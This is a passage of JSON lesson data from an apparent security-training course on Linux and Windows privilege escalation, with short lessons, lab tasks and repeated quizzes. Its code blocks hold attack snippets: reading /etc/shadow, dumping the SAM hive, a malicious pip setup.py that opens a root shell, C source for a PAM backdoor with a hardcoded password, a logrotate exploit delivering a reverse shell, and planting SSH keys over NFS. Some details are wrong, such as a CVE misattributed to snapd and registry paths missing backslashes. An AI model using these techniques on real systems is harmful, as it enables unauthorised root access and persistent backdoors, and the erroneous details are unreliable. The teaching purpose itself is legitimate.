cap_setuid \u2014 exploit cap_dac_read_search, cap_sys_ptrace, cap_net_raw.","sections":[{"type":"text","content":"cap_dac_read_search reads any file. cap_sys_ptrace injects into processes. cap_net_raw sniffs traffic. Each has a path to root."},{"type":"code","lang":"bash","content":"# cap_dac_read_search: read /etc/shadow\ngetcap -r / 2>/dev/null\n# If python3 has cap_dac_read_search:\npython3 -c 'print(open(\"/etc/shadow\").read())'\n# cap_sys_ptrace: inject shellcode into root process\n# cap_net_raw: sniff credentials from network"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"cap_dac_read_search allows...","opts":["Network scanning","Reading any file regardless of permissions","Process injection","Kernel access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-win-token-priv-deep","cat":"Privilege Escalation","title":"Windows Token Privileges Deep Dive","diff":4,"xp":250,"intro":"SeDebugPrivilege, SeBackupPrivilege, SeRestorePrivilege \u2014 each is a path to SYSTEM.","sections":[{"type":"text","content":"SeDebugPrivilege: attach to any process (inject into SYSTEM process). SeBackupPrivilege: read any file. SeRestorePrivilege: write any file."},{"type":"code","lang":"powershell","content":"whoami /priv\n# SeDebugPrivilege: inject into winlogon.exe\n# SeBackupPrivilege: read SAM/SYSTEM hives\nreg save HKLMSAM SAM /y\nreg save HKLMSYSTEM SYSTEM /y\n# SeRestorePrivilege: overwrite system files"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"SeDebugPrivilege allows...","opts":["File reading","Attaching a debugger to any process including SYSTEM","Network access","Registry reading only"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1}]},{"id":"pe-snap-exploit","cat":"Privilege Escalation","title":"Snap Package Privilege Escalation","diff":3,"xp":200,"intro":"Dirty Pipe and snap confinement bypass for local root.","sections":[{"type":"text","content":"Snap packages run confined but vulnerabilities in snapd or the kernel (CVE-2022-0847 DirtyPipe) can bypass confinement for root."},{"type":"code","lang":"bash","content":"# Check snapd version\nsnap version\n# CVE-2021-44228 snap-confine was vulnerable\n# Check for dirty_sock exploit\npython3 dirty_sockv2.py\n# DirtyPipe (CVE-2022-0847) works inside snaps too"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Snap confinement can be bypassed by...","opts":["Uninstalling snaps","Exploiting kernel or snapd vulnerabilities","Changing snap settings","Disabling AppArmor"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1}]},{"id":"pe-doas-misconfig","cat":"Privilege Escalation","title":"doas Misconfigurations","diff":2,"xp":150,"intro":"doas is a simpler sudo alternative \u2014 same misconfiguration risks.","sections":[{"type":"text","content":"If doas.conf allows running commands as root without password, exploit it like sudo -l."},{"type":"code","lang":"bash","content":"cat /etc/doas.conf\n# permit nopass user as root cmd /usr/bin/vi\n# Exploit: doas /usr/bin/vi -> :!bash"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"doas is similar to...","opts":["chmod","sudo (privilege elevation)","chown","passwd"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-pip-install","cat":"Privilege Escalation","title":"Pip Install as Root","diff":3,"xp":200,"intro":"If pip runs as root, install a malicious package for code execution.","sections":[{"type":"text","content":"If sudo pip install is allowed, create a malicious package with a setup.py that spawns a root shell."},{"type":"code","lang":"bash","content":"# Create malicious package\nmkdir evil && cat > evil/setup.py << 'EOF'\nimport os; os.system('/bin/bash')\nEOF\nsudo pip install ./evil/"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Sudo pip install is dangerous because...","opts":["Pip is slow","setup.py executes arbitrary code as root during installation","Pip uses encryption","Packages are sandboxed"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1}]},{"id":"pe-pam-backdoor","cat":"Privilege Escalation","title":"PAM Backdoor for Persistent Root","diff":5,"xp":300,"intro":"Modify PAM configuration to accept a backdoor password for any account.","sections":[{"type":"text","content":"Compile a custom PAM module that accepts a hardcoded password alongside the real one. Any account authenticates with either password."},{"type":"code","lang":"c","content":"// pam_backdoor.c\n#include <security/pam_modules.h>\n#include <string.h>\nPAM_EXTERN int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {\n    const char *password;\n    pam_get_authtok(pamh, PAM_AUTHTOK, &password, NULL);\n    if (strcmp(password, \"masterkey123\") == 0) return PAM_SUCCESS;\n    return PAM_AUTH_ERR; // fall through to next module\n}"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"A PAM backdoor provides...","opts":["Network access","A universal password that works for any account","File encryption","Log deletion"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-logrotate-exploit","cat":"Privilege Escalation","title":"Logrotate Race Condition","diff":3,"xp":200,"intro":"Exploit logrotate's file handling race for arbitrary file writes as root.","sections":[{"type":"text","content":"Logrotate runs as root and creates/moves files. A race condition (CVE-2016-1247) allows replacing the new log file with a symlink to write anywhere as root."},{"type":"code","lang":"bash","content":"# logrotten automates the exploit\n./logrotten -p payload.sh /var/log/target.log\n# payload.sh contains your reverse shell\n# When logrotate runs, it follows the symlink"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Logrotate exploits work because logrotate...","opts":["Runs as user","Runs as root and handles files with race conditions","Is disabled by default","Uses encryption"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1}]},{"id":"pe-nfs-squashing","cat":"Privilege Escalation","title":"NFS Permission Squashing Bypass","diff":4,"xp":250,"intro":"Bypass root_squash with other UIDs or NFSv4 ACLs.","sections":[{"type":"text","content":"root_squash only maps UID 0 to nobody. Other UIDs pass through \u2014 create a file as UID 1000 (the target user) to access their files."},{"type":"code","lang":"bash","content":"# Even with root_squash, non-root UIDs work\n# Become UID 1000 (target user) on YOUR machine:\nuseradd -u 1000 fakeuser\nsu fakeuser\n# Now create files on NFS share as UID 1000\necho 'SSH key' >> /mnt/nfs/home/targetuser/.ssh/authorized_keys"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"root_squash only blocks...","opts":["All remote access","UID 0 (root) \u2014 other UIDs pass through normally","All writes","NFS connections"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous 